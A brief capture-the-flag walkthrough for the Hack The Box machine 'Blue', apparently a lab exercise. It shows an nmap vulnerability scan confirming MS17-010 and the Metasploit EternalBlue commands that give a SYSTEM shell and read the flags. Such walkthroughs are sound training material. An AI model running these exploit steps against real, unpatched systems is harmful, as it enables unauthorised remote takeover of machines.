Blue
Write up for the HTB machine 'Blue'
1. Inital recon
1.1. nmap
We can guess by the name of the room 'Blue' that this machine might be vulnerable to CVE-2017-0143
, but let's just run an nmap scan to double check
nmap --script vuln 10.10.10.40
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
49152/tcp open unknown
49153/tcp open unknown
49154/tcp open unknown
49155/tcp open unknown
49156/tcp open unknown
49157/tcp open unknown
Host script results:
| smb-vuln-ms17-010:
| VULNERABLE:
| Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
| State: VULNERABLE
| IDs: CVE:CVE-2017-0143
| Risk factor: HIGH
| A critical remote code execution vulnerability exists in Microsoft SMBv1
| servers (ms17-010).
|
| Disclosure date: 2017-03-14
| References:
| https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
| https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: NT_STATUS_OBJECT_NAME_NOT_FOUND
2. user.txt and root.txt
2.1. metasploit
In msfconsole
run the following commands to get the eternal blue exploit running
search CVE-2017-0143
use 0
set rhosts 10.10.10.40
set lhosts YOUR_IP
exploit
once you have a meterpreter shell run shell
then whoami
to confirm we are nt authority\system
Our user flag can be found at C:\Users\haris\Desktop
and read using type "user.txt"
Our root flag can be found at C:\Users\Administrator\Desktop
and read using type "root.txt"
Last updated
Was this helpful?